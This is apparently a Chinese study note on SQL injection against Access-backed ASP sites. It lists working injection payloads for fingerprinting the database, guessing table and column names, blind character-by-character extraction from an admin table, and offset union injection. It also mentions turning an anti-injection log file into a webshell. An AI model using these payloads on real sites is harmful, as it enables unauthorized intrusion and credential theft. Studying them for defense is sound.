Access数据库

I_WORM2024-04-09 14:48

  • access是没有数据库的;只有表

  • 流程

    • 判断数据库类型--->判断表名----> 判断列名---->判断列名长度(列中第一条记录数据长度)---->读取数据

  • asp网站常用数据库:access和mssql数据库

  • 判断数据库

    • 如果有msysobjects则是access数据库;如果有sysobjects则是sqlsever数据库
    • and exists (select * from msysobjects)>0 access
    • and exists (select * from sysobjects)>0 sqlserver

  • 查表

    • and exists (select * from 表名)

  • 查列名

    • and exists (select 列名 from 表名)

  • 判断列名长度

    • and (select top 1 len(列名) from 表名)>5 :列名是否大于5

  • 逐字符爆破

    • and (select top 1 asc(mid(user,1,1)) from admin)=97
    • asc() 返回字符的ascii码
    • top 1 :只返回最上面一条数据

  • 偏移注入(需要结合联合查询)

    • 联合查询补充字段数=当前表的字段数-查询表的字段数*N
    • union select 1,2,3,4,5,,,* from admin_user :*代表了admin_user的总字段数的倍数

  • 通用性防注入

    • 将输入的行为存放到sqlin.asp文件中;类似于日志
    • 该操作会导致文件木马程序的执行;相当于文件上传了
相关推荐
唐青枫2 天前
MySQL JSON 实战详解:从存储、查询、更新到 JSON_TABLE 与索引
sql·mysql
吃糖的小孩2 天前
给 QQ AI 机器人设计“可控记忆”:会话摘要、手动长期记忆与角色卡边界
数据库
笃行3503 天前
金仓数据库数据安全双防线:静态存储加密与传输加密实战
数据库
笃行3503 天前
金仓数据库物理备份实战:sys_rman 全流程演练与误覆盖抢救
数据库
笃行3503 天前
金仓数据库逻辑备份实战:从全库导出到 Schema 替换的完整闭环
数据库
SelectDB3 天前
阶跃星辰基于 SelectDB 构建 PB 级 Agent 可观测平台
大数据·数据库·aigc
这个DBA有点耶3 天前
GROUP BY优化全解:如何写出既不丢数据又飞快的分组查询
数据库·mysql·架构
掉头发的王富贵4 天前
【StarRocks】极限十分钟入门StarRocks
数据库·sql·mysql
Nturmoils4 天前
WHERE 条件别凭习惯写,常用查询先跑一遍
数据库
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04飞书长连接_事件订阅(接收消息,审批任务状态变更)05Trae国际版与国内版深度测评:AI原生IDE的双生花06GitHub 镜像站点07【AI】2026 年具身智能模型和世界模型总结082026年AI架构实战:彻底解决OpenAI接口超时与封号,Python调用GPT-5.2/Sora2企业级架构详解(附源码+压测报告)09Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析102026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?